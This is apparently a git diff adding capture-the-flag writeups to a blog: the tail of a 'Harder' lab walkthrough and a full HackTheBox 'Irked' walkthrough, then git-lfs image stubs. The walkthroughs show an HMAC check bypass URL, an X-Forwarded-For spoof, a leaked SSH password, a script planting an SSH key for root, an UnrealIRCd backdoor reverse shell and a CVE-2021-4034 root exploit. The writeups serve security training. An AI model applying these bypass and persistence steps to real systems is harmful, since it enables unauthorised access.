+The second one is pretty interesting. So I look at the differences. While analyzing the code, I come across the following part:
+
+
+```bash
++<?php
++if (empty($_GET['h']) || empty($_GET['host'])) {
++   header('HTTP/1.0 400 Bad Request');
++   print("missing get parameter");
++   die();
++}
++require("secret.php"); //set $secret var
++if (isset($_GET['n'])) {
++   $secret = hash_hmac('sha256', $_GET['n'], $secret);
++}
++
++$hm = hash_hmac('sha256', $_GET['host'], $secret);
++if ($hm !== $_GET['h']){
++  header('HTTP/1.0 403 Forbidden');
++  print("extra security check failed");
++  die();
++}
++?>
+```
+We learn that it is necessary to have the parameters `h`, `host` et `n`. After some research on the function `hash_hmac`, I found on this [site](https://www.securify.nl/blog/spot-the-bug-challenge-2018-warm-up/) that it is possible to generate a hash ourselves and to use it for the authentication to the page. To do this I first generate a hash with the following commands:
+
+
+```bash
+┌──(d3vyce㉿kali)-[~/Documents/tmp/.git]
+└─$ php -a
+Interactive shell
+
+php > $secret = hash_hmac('sha256', $_GET['n'], $secret);
+PHP Warning:  Undefined array key "n" in php shell code on line 1
+PHP Warning:  Undefined variable $secret in php shell code on line 1
+php > $secret = hash_hmac('sha256', "d3vyce.fr", false);
+php > echo $secret;
+d0455abc97030b6f667f0f090493beca091e92c1e8c0e04ae09541afb26380c8
+```
+Can I create the following link:
+
+
+```bash
+http://pwd.harder.local/?n[]=1&h=d0455abc97030b6f667f0f090493beca091e92c1e8c0e04ae09541afb26380c8&host=d3vyce.fr
+```
+I came across a page with the following content:
+
+![](img/image-8.webp)
+
+So I add this new subdomain to the `/etc/hosts` file, then I go to the page. I get the following message:
+
+
+```bash
+Your IP is not allowed to use this webservice. Only 10.10.10.x is allowed
+```
+To access the page anyway, I add an `X-Forwarded-For` field to my request.
+
+
+```bash
+GET /index.php HTTP/1.1
+Host: shell.harder.local
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+X-Forwarded-For: 10.10.10.240
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=eb15g7jblveoceue5ekdjooiqj
+Connection: close
+```
+I finish on the following page:
+
+![](img/image-9.webp)
+
+It is a page that allows to execute commands, after some commands, I look for files related to the user on which the site is executed: `evs`.
+
+![](img/image-10.webp)
+
+I find a script `evs-backup.sh` which has the following content:
+
+
+```bash
+#!/bin/ash
+
+# ToDo: create a backup script, that saves the /www directory to our internal server
+# for authentication use ssh with user "evs" and password "U6j1brxGqbsUA$pMuIodnb$SZB4$bw14"
+```
+So now I can connect to the user via SSH and get the first flag.
+
+![](img/image-11.webp)
+
+## Privilege escalation
+
+I start by running the [linpeas.sh](https://linpeas.sh) script to get an overview of the machine. I find the following files:
+
+![](img/image-12.webp)
+
+Looking at the content of the script, I understand that it is used to execute scripts encrypted with gpg, knowing that we have the public key of the root user, it should be possible to create a script, sign it with the root key, then execute it as root!
+
+
+```bash
+#!/bin/sh
+
+if [ $# -eq 0 ]
+  then
+    echo -n "[*] Current User: ";
+    whoami;
+    echo "[-] This program runs only commands which are encypted for root@harder.local using gpg."
+    echo "[-] Create a file like this: echo -n whoami > command"
+    echo "[-] Encrypt the file and run the command: execute-crypted command.gpg"
+  else
+    export GNUPGHOME=/root/.gnupg/
+    gpg --decrypt --no-verbose "$1" | ash
+fi
+```
+I start by importing the key with the following command:
+
+![](img/image-13.webp)
+
+Then I check that it is well imported with the following command:
+
+
+```bash
+harder:~$ gpg --list-key
+/home/evs/.gnupg/pubring.kbx
+----------------------------
+pub   ed25519 2020-07-07 [SC]
+      6F99621E4D64B6AFCE56E864C91D6615944F6874
+uid           [ unknown] Administrator <root@harder.local>
+sub   cv25519 2020-07-07 [E]
+```
+I then create a script that will create a `/root/.ssh` and import my rsa.pub key. This should allow me to connect as root via SSH.
+
+
+```bash
+#!/bin/bash
+mkdir /root/.ssh
+echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDBDGmzCw/2VOIhk9owjxdyz+OwnO46rAXiDzV5gn6zObLChBCnpT1PpbYDlFNNwwykB0VCMOAKyrx465I0PxpgI8H8uh1goGYzUuNI0JmLnpUbTwkpTJgEYLA3pAM2g60XrRu5zf6bKuBTKm8gKrHuvy68EpAH+QPL7fnPmhMil+aNCOdZ9sQNMakmbQFvbWbeQ8SRbGHCPuRcViNSnkKhzzDNr+r8Co7ngT6lTHDdX7AdkDkwQ90rbi6Rr8x6GR9NLUcZ1D8DwlQ9MsHTq47RzRWUAUtMdtpUIO1qJNMcssO1hqA/Ej4tWsC5gyTCO7wzpd2V8OLMYvwBwbD/T5Upq4yBUorIr47oLqfO1ox+w7JX10hLf8PjFMxyuNY4karNNShWfFWX/jIyj7uxwYs4D/GDLS22EUtR7AMDgua1P3MjRBIT8u0O0Rwwn8Pj1C9uFQ9qnGlfEvGWqNRHKf777U6hwQLVn+M4aSU+SoW5arC+JglcnVpSquZT9qCXgO0= d3vyce@kali" > /root/.ssh/authorized_keys
+```
+I then encrypt the script with the following command:
+
+![](img/image-14.webp)
+
+Then I execute it with the following command:
+
+
+```bash
+run-crypted.sh script.sh
+```
+I can now connect via SSH to the root account and get the last flag.
+
+![](img/image-15.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not leave source code directly accessible on a website
+- Do not leave files with credit cards in them
+- Run web applications with a user with the minimum possible rights
+- Do not let the root public key accessible by another user than root
diff --git a/content/writeup-ctf/writeup-irked-htb/featured.png b/content/writeup-ctf/writeup-irked-htb/featured.png
new file mode 100644
index 0000000..45f0a5d
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d08a14d524e6adcd8ead9498776f7c92a57cae6f82530fc5778d168a94568e04
+size 272240
diff --git a/content/writeup-ctf/writeup-irked-htb/featured.webp b/content/writeup-ctf/writeup-irked-htb/featured.webp
new file mode 100644
index 0000000..77fbe28
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e964f5b0ce6655ba56191eaf946340391a8776ba77cadeccea509b1e6f0d8045
+size 24068
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-1.png b/content/writeup-ctf/writeup-irked-htb/img/image-1.png
new file mode 100644
index 0000000..22308a6
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1dcef166fdb2bba4a378f274f8938c230ea1456db2e548050ce73495e5fc8a35
+size 30464
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-1.webp b/content/writeup-ctf/writeup-irked-htb/img/image-1.webp
new file mode 100644
index 0000000..c3c3786
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:911d16c0a8a5168dbd5cc5c6ed3a2a818e7d225db3dc27cf3c72691992a6da8d
+size 32382
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-10.png b/content/writeup-ctf/writeup-irked-htb/img/image-10.png
new file mode 100644
index 0000000..2b5b1b1
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bbe5adcd12137459431ff68ff030d967e2f99d3fcab9a34bb527046a9451a634
+size 5084
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-10.webp b/content/writeup-ctf/writeup-irked-htb/img/image-10.webp
new file mode 100644
index 0000000..df151ff
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d8f341f3485ced0db32ee2f85064a8dd570412f4b0bd5670a15d26e6a9facb87
+size 3390
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-11.png b/content/writeup-ctf/writeup-irked-htb/img/image-11.png
new file mode 100644
index 0000000..2f37958
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:28a7a929efc2145790e4d22e48e26cade4588e3e6e68e0e665dbaec2a2058e13
+size 49910
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-11.webp b/content/writeup-ctf/writeup-irked-htb/img/image-11.webp
new file mode 100644
index 0000000..6728078
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:17988624623d280656f10961ee7f4f0dac6f6cb777b0de8156cca00d108ec195
+size 46436
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-2.png b/content/writeup-ctf/writeup-irked-htb/img/image-2.png
new file mode 100644
index 0000000..6a20a70
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c815b66d881c923df102192e206b9f84392df867a8bb3f7ee002cdc692fc053d
+size 265177
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-2.webp b/content/writeup-ctf/writeup-irked-htb/img/image-2.webp
new file mode 100644
index 0000000..ad34af3
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3b405882f15a534b36c1da13bf8909cb57ec99bad3119b9ba10470b506d72998
+size 28780
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-3.png b/content/writeup-ctf/writeup-irked-htb/img/image-3.png
new file mode 100644
index 0000000..b9bb470
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:986310b1235f0cee4dada10549b4f402e020ae2b02de9f9a7a05b0bb69301ed8
+size 14940
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-3.webp b/content/writeup-ctf/writeup-irked-htb/img/image-3.webp
new file mode 100644
index 0000000..4a2fdb6
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:417f8e248aab6901fb41d14915eb8b9616b15ce67628c2e4ad72249f9d394ba1
+size 11358
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-4.png b/content/writeup-ctf/writeup-irked-htb/img/image-4.png
new file mode 100644
index 0000000..27f464c
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:56a7d7c52f778e9130fec976a7e4681f9113ad84d4e8974979028302a5487f55
+size 57453
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-4.webp b/content/writeup-ctf/writeup-irked-htb/img/image-4.webp
new file mode 100644
index 0000000..702953e
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9baba3099fc41c1eb04dd624364e20b75dc62bba43722e076da058cec31702bc
+size 47106
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-5.png b/content/writeup-ctf/writeup-irked-htb/img/image-5.png
new file mode 100644
index 0000000..b3d0a80
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ba56559e2f31aab2fd221297421d1e12ad92de2471e6bedbcc6033b5c25822a0
+size 8600
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-5.webp b/content/writeup-ctf/writeup-irked-htb/img/image-5.webp
new file mode 100644
index 0000000..774e10b
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2f9ccb18887cf2d15243e30857983ef21f032c6854ea63c4a2818d9603320a34
+size 6498
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-6.png b/content/writeup-ctf/writeup-irked-htb/img/image-6.png
new file mode 100644
index 0000000..2df1ea9
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:14012d2bd6bbc37f4a8c2e4d67c215b681018f21dc3df2686086f2d97b564e0e
+size 10930
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-6.webp b/content/writeup-ctf/writeup-irked-htb/img/image-6.webp
new file mode 100644
index 0000000..b182676
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:258d6a332ffa18403bbc86cf4be49a52d297ff20e135ad1a927729770ca93024
+size 10934
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-7.png b/content/writeup-ctf/writeup-irked-htb/img/image-7.png
new file mode 100644
index 0000000..da1a1ee
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:76058216c0d83a6d9df2b96888dcf4922207f0589c8c542d77ac4b5f546b3ed7
+size 16206
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-7.webp b/content/writeup-ctf/writeup-irked-htb/img/image-7.webp
new file mode 100644
index 0000000..ef1e142
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:67d63ce3519500bb0e9f7ed86b61a7a3a608a31dc2ea0bb309d6bac4c49f2928
+size 23170
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-8.png b/content/writeup-ctf/writeup-irked-htb/img/image-8.png
new file mode 100644
index 0000000..602c080
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:df55203ce2b07b366aab458cb12ddfc5ea833d62f4144e69b45ebaf077aba5de
+size 9970
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-8.webp b/content/writeup-ctf/writeup-irked-htb/img/image-8.webp
new file mode 100644
index 0000000..b4dfc73
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:70bc5e95e1a9db5683c619dd571da8a57b656522a1556b525a207af39acdf576
+size 7388
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-9.png b/content/writeup-ctf/writeup-irked-htb/img/image-9.png
new file mode 100644
index 0000000..66ea995
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0ab88cd87c4ffd550754d697d8d93e81de87ce310f3edc60f3d6ca1af65f8823
+size 41862
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-9.webp b/content/writeup-ctf/writeup-irked-htb/img/image-9.webp
new file mode 100644
index 0000000..e27596d
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0622f28cf723787893b5747a4db631e9fe3fa3402401e7321829a42b3a6131c2
+size 57106
diff --git a/content/writeup-ctf/writeup-irked-htb/index.md b/content/writeup-ctf/writeup-irked-htb/index.md
new file mode 100644
index 0000000..4731552
--- /dev/null
+++ b/content/writeup-ctf/writeup-irked-htb/index.md
@@ -0,0 +1,97 @@
+---
+title: "Writeup - Irked (HTB)"
+date: 2022-05-24
+slug: "writeup-irked-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Irked](https://app.hackthebox.com/machines/Irked) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.11.146
+```
+Many TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 8.2)
+- 80/tcp : HTTP web server (Apache 2.4.41)
+- 111/tcp : rpcbind
+- 6697/tcp : IRC (UnrealIRCd)
+- 8067/tcp : IRC (UnrealIRCd)
+- 52411/tcp : Status
+- 65534/tcp : IRC (UnrealIRCd)
+
+![](img/image-2.webp)
+
+## Exploit
+
+Following the nmap scan I notice that there is the port 65534 open with the UnrealIRC service. After some research on google I find that there is a big exploit for version 3.2.8.1. Before doing anything else I start by testing this exploit. I search the module in Metasploit :
+
+![](img/image-3.webp)
+
+Then after setting the options I launch the exploit:
+
+![](img/image-4.webp)
+
+Without success, but it's weird it's an error related to a setting and not a problem related to the target, so I try a second version that I find on github: [UnrealIRCd-3.2.8.1-Backdoor](https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor)
+
+After adding my IP/Port in the file, I launch the exploit with the following command:
+
+![](img/image-5.webp)
+
+After a few seconds I now have a reverse shell as ircd.
+
+![](img/image-6.webp)
+
+I don't have the permissions to read the first flag, but I find a hidden `.backup` file I can consult:
+
+![](img/image-7.webp)
+
+In this file a sentence and what could look like a password. In the sentence it is referred to steganography.
+
+
+> Steganography  is the practice of concealing a message within another message or a physical object. In computing/electronic contexts, a computer file, message, image, or video is concealed within another file, message, image, or video.
+
+The only image we've come across so far is on the site of the beginning of the machine. I download it and use [steghide](https://0xrick.github.io/lists/stego/#steghide) with the password I found.
+
+![](img/image-8.webp)
+
+I manage to extract a `pass.txt` file! In this file I find the following password :
+
+
+```bash
+Kab6h+m+bbp2J:HG
+```
+So I try to connect via SSH to the user `djmardov` :
+
+![](img/image-9.webp)
+
+I now have a shell with the user `djmardov` and I can get the first flag.
+
+## Privilege escalation
+
+I start by running a [linpeas.sh](https://linpeas.sh) scan.
+
+![](img/image-10.webp)
+
+Quickly I find that the machine is vulnerable to CVE-2021-4034. So I will use the following [CVE-2021-4034 Github](https://github.com/berdav/CVE-2021-4034) exploit.
+
+After downloading the different files, I compile the code with `make`, then I launch the program.
+
+![](img/image-11.webp)
+
+I now have a `root` shell and can retrieve the last flag.
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Update UnrealIRC to fix the exploit
+- Do not store clear passwords in a file
+- Update Linux to fix CVE-2021-4034
diff --git a/content/writeup-ctf/writeup-late-htb/featured.png b/content/writeup-ctf/writeup-late-htb/featured.png
new file mode 100644
index 0000000..8ebe7ce
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6c8bfc06e2aed14b2d8d07b2cbece57b69301ece8e4dc03670a1ce144d6515fd
+size 207942
diff --git a/content/writeup-ctf/writeup-late-htb/featured.webp b/content/writeup-ctf/writeup-late-htb/featured.webp
new file mode 100644
index 0000000..a5ee470
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3bf9d37da11370569f98ab8c5bf516d5e70e7012a812e69ad4eb88c25cda4766
+size 20012
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-1.png b/content/writeup-ctf/writeup-late-htb/img/image-1.png
new file mode 100644
index 0000000..e26e11f
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ad525c4be0f05c98c2c1d9ae69d1d07bdb5561e439e95f82e854afa2bc324772
+size 35889
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-1.webp b/content/writeup-ctf/writeup-late-htb/img/image-1.webp
new file mode 100644
index 0000000..699f2bb
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c3290f8978efc267ac4fd6d918e09879526af45190795715ee791c962d7a572c
+size 34476
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-10.png b/content/writeup-ctf/writeup-late-htb/img/image-10.png
new file mode 100644
index 0000000..fb8f496
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:39557633a105fae22b8b91eb20a2aec9c6ba6fd2b9dda993accc7a2d52af25af
+size 27288
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-10.webp b/content/writeup-ctf/writeup-late-htb/img/image-10.webp
new file mode 100644
index 0000000..323b257
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7db8e4cc4d133bbfea60335ed144395afb589fee089da1f6575580592975bb96
+size 27602
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-11.png b/content/writeup-ctf/writeup-late-htb/img/image-11.png
new file mode 100644
index 0000000..42f6fbc
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b1f3e92cb1e9ac76c0abef48a1b0ba4405b69e6684849ff5bdd0507a056008f1
+size 3809
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-11.webp b/content/writeup-ctf/writeup-late-htb/img/image-11.webp
new file mode 100644
index 0000000..56a897c
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ee6bb0cf5c45c812de9d7c83c3cb353570e10a8b8ffe32fdf34abc46e0065b28
+size 2980
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-12.png b/content/writeup-ctf/writeup-late-htb/img/image-12.png
new file mode 100644
index 0000000..d94d245
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-12.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:936c8d193abd91970f7cfd9af1ba78a7073caebf1191aae799c86e957e76b5b2
+size 35866
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-12.webp b/content/writeup-ctf/writeup-late-htb/img/image-12.webp
new file mode 100644
index 0000000..aa1146e
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-12.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5a5e195aaad6c1531a714719469d0ce0f75159ccd92a50709cb88e8f9ca2907f
+size 35318
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-13.png b/content/writeup-ctf/writeup-late-htb/img/image-13.png
new file mode 100644
index 0000000..fa36aa0
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-13.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d67d7c17d1c8762178206e6f96ae53ccf74051e33838132151148609a04b78de
+size 6707
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-13.webp b/content/writeup-ctf/writeup-late-htb/img/image-13.webp
new file mode 100644
index 0000000..66986c7
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-13.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5a30114603b0fd9e7749900f76e474f5c9d2ae121d329612bf648953d9e424fe
+size 7848
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-2.png b/content/writeup-ctf/writeup-late-htb/img/image-2.png
new file mode 100644
index 0000000..238f704
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:13097dfcd6e3ee2a81ab0be2744ff77ce9ec9265118eca658f92ea5bbedad485
+size 762949
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-2.webp b/content/writeup-ctf/writeup-late-htb/img/image-2.webp
new file mode 100644
index 0000000..b885178
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7627941e43f2c35ed4d3c0702f02255edf5c19e47efdbf8795577ffcfbb85a82
+size 98682
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-3.png b/content/writeup-ctf/writeup-late-htb/img/image-3.png
new file mode 100644
index 0000000..e7bc91f
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2513dedd6528fb26c8d11887464e1774c202c1a0a8c4614184b66baa6cac5104
+size 46214
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-3.webp b/content/writeup-ctf/writeup-late-htb/img/image-3.webp
new file mode 100644
index 0000000..645734d
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:31984e9df97a16471132705223df00417e01ef75ee743005880562377e133337
+size 40932
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-4.png b/content/writeup-ctf/writeup-late-htb/img/image-4.png
new file mode 100644
index 0000000..10be5b5
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f46c8c938bc88bb9b18a7dcf34a45a6e1bef7b351ba88fe7a8eda99ff772c5b4
+size 50750
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-4.webp b/content/writeup-ctf/writeup-late-htb/img/image-4.webp
new file mode 100644
index 0000000..a187a38
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:751b5654a8f03ff6841849f97a3235a6eb4be2082300d17051da8e2e52c58df9
+size 50222
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-5.png b/content/writeup-ctf/writeup-late-htb/img/image-5.png
new file mode 100644
index 0000000..8d3549b
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a8e7b569d8005d9d1c6e4add2c1b510ffdc2fc706d9e5c71d4edbda53f4da6df
+size 46065
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-5.webp b/content/writeup-ctf/writeup-late-htb/img/image-5.webp
new file mode 100644
index 0000000..40e620f
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c6ba8b8bb7543dfb797d9649c1d6e947c0e079b5d46734dcb890d5759e365f6c
+size 36904
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-6.png b/content/writeup-ctf/writeup-late-htb/img/image-6.png
new file mode 100644
index 0000000..fec4f1d
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8d34d8aec28cb840840879b9c808b04682950465165913872a72675810f73f7f
+size 39767
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-6.webp b/content/writeup-ctf/writeup-late-htb/img/image-6.webp
new file mode 100644
index 0000000..3b1d03f
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:30e909c8930dffb1388f6d849c5907087c034ea0dc3e089d6572a6998ba3d03d
+size 23692
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-7.png b/content/writeup-ctf/writeup-late-htb/img/image-7.png
new file mode 100644
index 0000000..b20910e
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0e6f1f901834ca94b5749fab7eb123b1b413a2d8e1d1372b5e4f31bd94898ff0
+size 2421
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-7.webp b/content/writeup-ctf/writeup-late-htb/img/image-7.webp
new file mode 100644
index 0000000..389d251
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1d53e2a52449fd49e562a58f4674c8581c11bfd5c31b7e1ff4d9d32e83f0c44c
+size 2180
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-8.png b/content/writeup-ctf/writeup-late-htb/img/image-8.png
new file mode 100644
index 0000000..9a92137
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:40b12ed439b1686b09b566184da8d7fff7bc069bdc3bc1a0b95087684eafa9a7
+size 9039
diff --git a/content/writeup-ctf/writeup-late-htb/img/image-8.webp b/content/writeup-ctf/writeup-late-htb/img/image-8.webp
new file mode 100644
index 0000000..9caf0f7
--- /dev/null
+++ b/content/writeup-ctf/writeup-late-htb/img/image-8.webp
